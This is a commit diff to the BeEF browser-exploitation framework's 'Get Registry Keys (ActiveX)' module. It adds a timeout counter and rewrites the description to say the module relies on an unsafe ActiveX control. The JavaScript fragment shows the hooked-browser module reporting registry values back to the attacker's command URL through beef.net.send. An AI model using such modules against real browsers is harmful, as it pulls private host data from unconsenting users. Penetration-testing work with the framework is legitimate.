Updated description for Get Registry Keys module
git-svn-id: https://beef.googlecode.com/svn/trunk@1398 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
@@ -16,6 +16,7 @@
|
||||
beef.execute(function() {
|
||||
|
||||
var internal_counter = 0;
|
||||
var timeout = 30;
|
||||
var result;
|
||||
var key_paths;
|
||||
|
||||
@@ -39,8 +40,8 @@ beef.execute(function() {
|
||||
return;
|
||||
} catch (e) {
|
||||
internal_counter++;
|
||||
if (internal_counter > 30) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'key_values=time out');
|
||||
if (internal_counter > timeout) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'key_values=Timeout after '+timeout+' seconds');
|
||||
return;
|
||||
}
|
||||
setTimeout(function() {waituntilok()},1000);
|
||||
|
||||
@@ -19,7 +19,7 @@ beef:
|
||||
enable: true
|
||||
category: "Host"
|
||||
name: "Get Registry Keys (ActiveX)"
|
||||
description: "Retrieves the values of Windows Registry keys using ActiveX.<br /><br />The user will be prompted to run the ActiveX control.<br /><br />Note: each registry key must be placed on a new line."
|
||||
description: "Retrieves the values of Windows Registry keys using an (unsafe) ActiveX control.<br /><br />Internet Explorer does not allow scripting of unsafe ActiveX controls in the Internet zone by default.<br /><br />Note: each registry key must be placed on a new line."
|
||||
authors: ["bcoles"]
|
||||
target:
|
||||
user_notify: ["IE"]
|
||||
|
||||
Reference in New Issue
Block a user